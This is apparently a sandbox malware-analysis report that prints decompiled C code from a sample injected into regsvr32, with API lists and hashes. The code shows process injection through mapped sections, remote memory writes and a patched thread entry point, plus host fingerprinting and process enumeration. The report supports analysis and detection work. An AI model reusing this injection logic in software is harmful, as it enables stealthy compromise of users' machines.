	_v116.cbClsExtra = _t138;
	_v116.hInstance = _t138;
	if(RegisterClassExA( &_v116) != 0) {
		_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
		if(_t132 != 0) {
			DestroyWindow(_t132);
			UnregisterClassA( &_v64, _t138);
		}
	}
	_t105 =  *0x42bf818; // 0x48ef8b0
	_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
	_t158 = _v12;
	if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
		goto L15;
	} else {
		_t154 = E042A8C43( *0x42bf81c, 0x1ac4);
		_v36 = _t154;
		if(_t154 == 0) {
			goto L15;
		}
		 *((intOrPtr*)(_t154 + 0x224)) = _v8;
		_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
		WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
		E042A8BF4( &_v36, 0x1ac4);
		_t119 =  *0x42bf81c; // 0x48efbe8
		_t155 =  *0x42bf830; // 0x42a0000
		_v36 = _t119;
		 *0x42bf830 = _v8;
		 *0x42bf81c = _t163;
		E042A8CBB(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
		E042AD3C6(_v16, _v8, _v44);
		_t124 = E042AA43D("quatr");
		_v53 = _t138;
		_t147 = 0xf;
		if(_t124 > _t147) {
			do {
				L12:
				_t63 = _t138 + 0x41; // 0x41
				 *((char*)(_t165 + _t138 - 0x40)) = _t63;
				_t138 = _t138 + 1;
			} while (_t138 < _t147);
                                                                                                                                                                                              						L13:
                                                                                                                                                                                              						lstrlenW( &_v68);
                                                                                                                                                                                              						 *0x42bf830 = _t155;
                                                                                                                                                                                              						 *0x42bf81c = _v36;
                                                                                                                                                                                              						goto L17;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t147 = _t124;
                                                                                                                                                                                              					if(_t147 == 0) {
                                                                                                                                                                                              						goto L13;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}







































                                                                                                                                                                                              APIs
                                                                                                                                                                                              • NtCreateSection.NTDLL(042AD982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 042AD4B9
                                                                                                                                                                                              • RegisterClassExA.USER32(?), ref: 042AD50D
                                                                                                                                                                                              • CreateWindowExA.USER32 ref: 042AD538
                                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 042AD543
                                                                                                                                                                                              • UnregisterClassA.USER32 ref: 042AD54E
                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(042AD982,00000000), ref: 042AD579
                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(042AD982,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 042AD5A0
                                                                                                                                                                                              • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 042AD5E6
                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 042AD600
                                                                                                                                                                                                • Part of subcall function 042A8BF4: HeapFree.KERNEL32(00000000,00000000), ref: 042A8C3A
                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,042A61C5), ref: 042AD678
                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(00000000), ref: 042AD6C0
                                                                                                                                                                                              • NtClose.NTDLL(00000000), ref: 042AD6D4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
                                                                                                                                                                                              • String ID: 0$18293$aeroflot$quatr
                                                                                                                                                                                              • API String ID: 494031690-2640591812
                                                                                                                                                                                              • Opcode ID: bc35cf97d77579b51bd611f0e4b1ef9e7aa892dc1eaab258334078021333d573
                                                                                                                                                                                              • Instruction ID: 65cf8acc24700fdd4cd23e6d38a354ab4b7e87c78bcd78f68cb8be8b0ec72ae7
                                                                                                                                                                                              • Opcode Fuzzy Hash: bc35cf97d77579b51bd611f0e4b1ef9e7aa892dc1eaab258334078021333d573
                                                                                                                                                                                              • Instruction Fuzzy Hash: E6811EB1B10209AFDB10DF99ED88EDEBBB9FB08704F154069E905E7250D774AE41CBA4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 211 42ad959-42ad972 call 42ad218 214 42ada4b-42ada56 call 42ad38b 211->214 215 42ad978-42ad986 call 42ad447 211->215 215->214 220 42ad98c-42ad9c3 call 42a8d6d GetThreadContext 215->220 220->214 223 42ad9c9-42ada09 NtProtectVirtualMemory 220->223 224 42ada0b-42ada26 NtWriteVirtualMemory 223->224 225 42ada49 223->225 224->225 226 42ada28-42ada47 NtProtectVirtualMemory 224->226 225->214 226->214 226->225
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E042AD959(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                              				long _v12;
                                                                                                                                                                                              				void* _v16;
                                                                                                                                                                                              				intOrPtr _v23;
                                                                                                                                                                                              				void _v24;
                                                                                                                                                                                              				long _v28;
                                                                                                                                                                                              				struct _CONTEXT _v744;
                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                              				void* _t57;
                                                                                                                                                                                              				long _t59;
                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                              				void** _t65;
                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t65 = __edx;
                                                                                                                                                                                              				_t57 = __ecx;
                                                                                                                                                                                              				_t66 = 0;
                                                                                                                                                                                              				if(E042AD218(__ecx, __edx, __edx, 0) != 0) {
                                                                                                                                                                                              					_t33 = E042AD447( *((intOrPtr*)(__edx)), _a4); // executed
                                                                                                                                                                                              					_t66 = _t33;
                                                                                                                                                                                              					if(_t66 != 0) {
                                                                                                                                                                                              						E042A8D6D( &_v744, 0, 0x2cc);
                                                                                                                                                                                              						_v744.ContextFlags = 0x10002;
                                                                                                                                                                                              						if(GetThreadContext(_t65[1],  &_v744) != 0) {
                                                                                                                                                                                              							_t62 = _v744.Eax;
                                                                                                                                                                                              							_v12 = _v12 & 0x00000000;
                                                                                                                                                                                              							_v24 = 0xe9;
                                                                                                                                                                                              							_t59 = 5;
                                                                                                                                                                                              							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
                                                                                                                                                                                              							_v8 = _t59;
                                                                                                                                                                                              							_v16 = _t62;
                                                                                                                                                                                              							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
                                                                                                                                                                                              								L6:
                                                                                                                                                                                              								_t66 = 0;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_v28 = _v28 & 0x00000000;
                                                                                                                                                                                              								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
                                                                                                                                                                                              									goto L6;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E042AD38B();
                                                                                                                                                                                              				return _t66;
                                                                                                                                                                                              			}




















                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 042AD218: LoadLibraryW.KERNEL32 ref: 042AD312
                                                                                                                                                                                                • Part of subcall function 042AD447: NtCreateSection.NTDLL(042AD982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 042AD4B9
                                                                                                                                                                                                • Part of subcall function 042AD447: RegisterClassExA.USER32(?), ref: 042AD50D
                                                                                                                                                                                                • Part of subcall function 042AD447: CreateWindowExA.USER32 ref: 042AD538
                                                                                                                                                                                                • Part of subcall function 042AD447: DestroyWindow.USER32(00000000), ref: 042AD543
                                                                                                                                                                                                • Part of subcall function 042AD447: UnregisterClassA.USER32 ref: 042AD54E
                                                                                                                                                                                                • Part of subcall function 042A8D6D: memset.MSVCRT ref: 042A8D7F
                                                                                                                                                                                              • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 042AD9BB
                                                                                                                                                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 042ADA04
                                                                                                                                                                                              • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 042ADA21
                                                                                                                                                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 042ADA42
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1578692462-0
                                                                                                                                                                                              • Opcode ID: bb89a34f1ff9af312bbd816621c6c60cebc267023b74b4a8921a8b7dc147e8a6
                                                                                                                                                                                              • Instruction ID: eab870003aefcbe096c2a26280ba740c0498c280c0339285c321221771deb251
                                                                                                                                                                                              • Opcode Fuzzy Hash: bb89a34f1ff9af312bbd816621c6c60cebc267023b74b4a8921a8b7dc147e8a6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A312BB2B1010AAFDB11DFA8DD88FDEBBB9EF48314F1041A5E904E2251D730EB558B90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                                                              			E042ADF3D(void* __fp0) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v144;
                                                                                                                                                                                              				char _v656;
                                                                                                                                                                                              				char _v668;
                                                                                                                                                                                              				char _v2644;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				struct _OSVERSIONINFOA* _t68;
                                                                                                                                                                                              				intOrPtr _t70;
                                                                                                                                                                                              				void* _t71;
				intOrPtr _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t92;
				void* _t93;
				void* _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				short _t106;
				char _t108;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t123;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t143;
				intOrPtr _t148;
				void* _t149;
				WCHAR* _t150;
				char* _t151;
				intOrPtr _t162;
				intOrPtr _t177;
				void* _t191;
				struct _OSVERSIONINFOA* _t192;
				void* _t193;
				void* _t195;
				char _t198;
				void* _t199;
				char* _t200;
				void* _t203;
				int* _t204;
				void* _t216;

				_t216 = __fp0;
				_t148 =  *0x42bf830; // 0x42a0000
				_t68 = E042A8BDE(0x1ac4);
				_t192 = _t68;
				if(_t192 != 0) {
					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
					_t70 =  *0x42bf818; // 0x48ef8b0
					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
					_t3 = _t192 + 0x648; // 0x648
					E042B3548( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
					_t73 =  *0x42bf818; // 0x48ef8b0
					_t5 = _t192 + 0x1644; // 0x1644
					_t194 = _t5;
					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
					_t207 = _t74;
					if(_t74 != 0) {
						 *((intOrPtr*)(_t192 + 0x1854)) = E042A95F3(_t194, _t207);
					}
					_t75 =  *0x42bf818; // 0x48ef8b0
					_t77 = E042AC879( *((intOrPtr*)(_t75 + 0x12c))()); // executed
					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
					_t159 =  *_t77;
					if(E042AC9F4( *_t77) == 0) {
						_t79 = E042AC8C9(_t159, _t194); // executed
						__eflags = _t79;
						_t162 = (0 | _t79 > 0x00000000) + 1;
						__eflags = _t162;
						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
					} else {
						 *((intOrPtr*)(_t192 + 0x214)) = 3;
					}
					_t14 = _t192 + 0x220; // 0x220, executed
					_t80 = E042AF3A3(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
					_t81 = E042AF368(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
					_t17 = _t192 + 0x114; // 0x114
					_t195 = _t17;
					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
					_push( &_v16);
					_v12 = 0x80;
					_push( &_v8);
					_v8 = 0x100;
					_push( &_v656);
					_push( &_v12);
					_push(_t195);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
					_t87 =  *0x42bf820; // 0x48efaa0
					_push(0); // executed
					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
						GetLastError();
					}
					_t90 = GetSystemMetrics(0x1000);
					_t28 = _t192 + 0x228; // 0x228
					_t149 = _t28;
					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
					E042ADF36(_t149); // executed
					_t211 = _t149;
					if(_t149 != 0) {
						 *((intOrPtr*)(_t192 + 0x434)) = E042A95F3(_t149, _t211);
					}
					_t92 = E042AC6CE();
					_t33 = _t192 + 0xb0; // 0xb0
					_t196 = _t33;
					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
					_t93 = E042AC4C1(_t92, _t33, _t211, _t216);
					_t35 = _t192 + 0xd0; // 0xd0
					E042A99DF(_t93, _t33, _t35);
					_t36 = _t192 + 0x438; // 0x438
					E042A960D(_t149, _t36);
					_t97 = E042AE2C5(_t196, E042AA43D(_t33), 0);
					_t37 = _t192 + 0x100c; // 0x100c
					E042AC6E4(_t97, _t37, _t216);
					_t99 =  *0x42bf818; // 0x48ef8b0
					_t101 = E042ACA46( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
					E042A8D6D(_t192, 0, 0x9c);
					_t204 = _t203 + 0xc;
					_t192->dwOSVersionInfoSize = 0x9c;
					GetVersionExA(_t192);
					 *((intOrPtr*)(_t192 + 0xa8)) = E042ADD39(_t100);
					_t106 = E042ADD62(_t105);
					_t41 = _t192 + 0x1020; // 0x1020
					_t150 = _t41;
					 *((short*)(_t192 + 0x9c)) = _t106;
					GetWindowsDirectoryW(_t150, 0x104);
					_t108 = E042A9DF2(_t105, 0x9cf);
					_t177 =  *0x42bf818; // 0x48ef8b0
					_t198 = _t108;
					 *_t204 = 0x104;
					_push( &_v668);
					_push(_t198);
					_v8 = _t198;
					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
						_t143 =  *0x42bf818; // 0x48ef8b0
						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
					}
					E042A8BAF( &_v8);
					_t113 =  *0x42bf818; // 0x48ef8b0
					_t48 = _t192 + 0x1434; // 0x1434
					_t199 = _t48;
					 *_t204 = 0x209;
					_push(_t199);
					_push(L"USERPROFILE");
					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
						E042A9E51(_t199, 0x105, L"%s\\%s", _t150);
						_t141 =  *0x42bf818; // 0x48ef8b0
						_t204 =  &(_t204[5]);
						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
					}
					_push(0x20a);
					_t51 = _t192 + 0x122a; // 0x122a
					_t151 = L"TEMP";
					_t116 =  *0x42bf818; // 0x48ef8b0
					_push(_t151);
					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
						_t138 =  *0x42bf818; // 0x48ef8b0
						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
					}
					_push(0x40);
					_t200 = L"SystemDrive";
					_push( &_v144);
					_t119 =  *0x42bf818; // 0x48ef8b0
					_push(_t200);
                                                                                                                                                                                              					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
                                                                                                                                                                                              						_t136 =  *0x42bf818; // 0x48ef8b0
                                                                                                                                                                                              						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_v8 = 0x7f;
                                                                                                                                                                                              					_t59 = _t192 + 0x199c; // 0x199c
                                                                                                                                                                                              					_t123 =  *0x42bf818; // 0x48ef8b0
                                                                                                                                                                                              					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
                                                                                                                                                                                              					_t62 = _t192 + 0x100c; // 0x100c
                                                                                                                                                                                              					E042B3548(E042AE2C5(_t62, E042AA43D(_t62), 0),  &_v2644);
                                                                                                                                                                                              					_t63 = _t192 + 0x1858; // 0x1858
                                                                                                                                                                                              					E042B351A( &_v2644, _t63, 0x20);
                                                                                                                                                                                              					_push( &_v2644);
                                                                                                                                                                                              					_push(0x1e);
                                                                                                                                                                                              					_t66 = _t192 + 0x1878; // 0x1878
                                                                                                                                                                                              					_t191 = 0x14;
                                                                                                                                                                                              					E042A96DA(_t66, _t191);
                                                                                                                                                                                              					_t134 = E042ADAE3(_t191); // executed
                                                                                                                                                                                              					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
                                                                                                                                                                                              					return _t192;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t68;
                                                                                                                                                                                              			}

                                                                                                                                                                                              0x042ae27f
                                                                                                                                                                                              0x042ae286
                                                                                                                                                                                              0x042ae294
                                                                                                                                                                                              0x042ae29f
                                                                                                                                                                                              0x042ae2a0
                                                                                                                                                                                              0x042ae2a4
                                                                                                                                                                                              0x042ae2aa
                                                                                                                                                                                              0x042ae2ab
                                                                                                                                                                                              0x042ae2b3
                                                                                                                                                                                              0x042ae2b8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ae2c0
                                                                                                                                                                                              0x042ae2c4

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 042A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,042A959D,00000100,?,042A6507), ref: 042A8BEC
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 042ADF64
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 042AE05E
                                                                                                                                                                                              • GetSystemMetrics.USER32(00001000), ref: 042AE06E
                                                                                                                                                                                              • GetVersionExA.KERNEL32(00000000), ref: 042AE123
                                                                                                                                                                                                • Part of subcall function 042AC8C9: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,042A0000), ref: 042AC96D
                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 042AE14E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastMetricsNotificationProcessSystemVersionWindows
                                                                                                                                                                                              • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                                                                                                              • API String ID: 3131805607-2706916422
                                                                                                                                                                                              • Opcode ID: fcd6a09800ded9ab94078dfdb3487f42d885d0e0328a33c2a22ee9deb537bcb8
                                                                                                                                                                                              • Instruction ID: 1a05c43ab6378ff9c1f3b65bc1ab04890b2c62b0807a7f1e7a3d25432d7676ef
                                                                                                                                                                                              • Opcode Fuzzy Hash: fcd6a09800ded9ab94078dfdb3487f42d885d0e0328a33c2a22ee9deb537bcb8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 95918C71710605AFE704EF75E849FEAB7A8FF08304F014169E959D7240DB74BAA58BE0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                              			E042AC5EC(WCHAR* __ecx, WCHAR* __edx) {
                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                              				long _v12;
                                                                                                                                                                                              				WCHAR* _v16;
                                                                                                                                                                                              				short _v528;
                                                                                                                                                                                              				short _v1040;
                                                                                                                                                                                              				short _v1552;
                                                                                                                                                                                              				intOrPtr _t23;
                                                                                                                                                                                              				WCHAR* _t27;
                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                              				long _t38;
                                                                                                                                                                                              				WCHAR* _t43;
                                                                                                                                                                                              				WCHAR* _t56;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t44 = __ecx;
                                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              				_t43 = __edx;
                                                                                                                                                                                              				_t56 = __ecx;
                                                                                                                                                                                              				E042A8D6D(__edx, 0, 0x100);
                                                                                                                                                                                              				_v12 = 0x100;
                                                                                                                                                                                              				_t23 =  *0x42bf818; // 0x48ef8b0
                                                                                                                                                                                              				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
                                                                                                                                                                                              				lstrcpynW(__edx,  &_v528, 0x100);
                                                                                                                                                                                              				_t27 = E042A9DF2(_t44, 0xad6);
                                                                                                                                                                                              				_v16 = _t27;
                                                                                                                                                                                              				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                                                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                                                              				_v8 = _v8 &  ~_t29;
                                                                                                                                                                                              				E042A8BAF( &_v16);
                                                                                                                                                                                              				_t33 = E042AA456(_t43);
                                                                                                                                                                                              				E042A9E51( &(_t43[E042AA456(_t43)]), 0x100 - _t33, L"%u", _v8);
                                                                                                                                                                                              				lstrcatW(_t43, _t56);
                                                                                                                                                                                              				_t38 = E042AA456(_t43);
                                                                                                                                                                                              				_v12 = _t38;
                                                                                                                                                                                              				CharUpperBuffW(_t43, _t38);
                                                                                                                                                                                              				return E042AE2C5(_t43, E042AA456(_t43) + _t40, 0);
                                                                                                                                                                                              			}

















                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 042A8D6D: memset.MSVCRT ref: 042A8D7F
                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000100), ref: 042AC633
                                                                                                                                                                                              • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 042AC665
                                                                                                                                                                                                • Part of subcall function 042A9E51: _vsnwprintf.MSVCRT ref: 042A9E6E
                                                                                                                                                                                              • lstrcatW.KERNEL32(?,00000114), ref: 042AC69E
                                                                                                                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 042AC6B0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 455400327-0
                                                                                                                                                                                              • Opcode ID: 7d56ce8f781556269f2ecbe13f34fe2e1e4025666a3d8f071777577e600bfdec
                                                                                                                                                                                              • Instruction ID: 2c589f7de755806451cc971345b69cc28bf2e3f51cfdb2887e9cd71f65fea77e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d56ce8f781556269f2ecbe13f34fe2e1e4025666a3d8f071777577e600bfdec
                                                                                                                                                                                              • Instruction Fuzzy Hash: FC2132B2B10218BFE710ABA4EC89FEEB7BCDF44314F104565F905D2181EA74AE54CAA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                              			E042AB96A(void* __ecx, void* __edx) {
                                                                                                                                                                                              				void* _v304;
                                                                                                                                                                                              				void* _v308;
                                                                                                                                                                                              				intOrPtr _v312;
                                                                                                                                                                                              				signed int _t16;
                                                                                                                                                                                              				signed int _t17;
                                                                                                                                                                                              				intOrPtr _t30;
                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                              				void* _t43;
                                                                                                                                                                                              				void* _t45;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t33 = __edx;
                                                                                                                                                                                              				_v304 = __ecx;
                                                                                                                                                                                              				_t16 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                                              				_t45 = _t16;
                                                                                                                                                                                              				_t17 = _t16 | 0xffffffff;
                                                                                                                                                                                              				if(_t45 != _t17) {
                                                                                                                                                                                              					E042A8D6D( &_v304, 0, 0x128);
                                                                                                                                                                                              					_v304 = 0x128;
                                                                                                                                                                                              					if(Process32First(_t45,  &_v304) != 0) {
                                                                                                                                                                                              						do {
                                                                                                                                                                                              							_t43 = _v312( &_v308, _t33);
                                                                                                                                                                                              						} while (_t43 != 0 && Process32Next(_t45,  &_v308) != 0);
                                                                                                                                                                                              						FindCloseChangeNotification(_t45);
                                                                                                                                                                                              						_t17 = 0 | _t43 == 0x00000000;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t30 =  *0x42bf818; // 0x48ef8b0
                                                                                                                                                                                              						 *((intOrPtr*)(_t30 + 0x30))(_t45);
                                                                                                                                                                                              						_t17 = 0xfffffffe;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t17;
                                                                                                                                                                                              			}













                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 042AB988
                                                                                                                                                                                                • Part of subcall function 042A8D6D: memset.MSVCRT ref: 042A8D7F
                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 042AB9B8
                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 042AB9EB
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 042AB9F8
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32memset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2518216231-0
                                                                                                                                                                                              • Opcode ID: 8fc6fbedf28ba5b912ca11f314a2719fb32c7728ee3f8f3d93defd349cef7d9b
                                                                                                                                                                                              • Instruction ID: 4ace7aab7f94a25a6d16caff51e89d54956854c46f1bac69a00c2dd571b949a3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fc6fbedf28ba5b912ca11f314a2719fb32c7728ee3f8f3d93defd349cef7d9b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 391181723143025BC310DA68BC49E9A7BE8EF89360F150A29FA65C7180EB24E955C7A5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
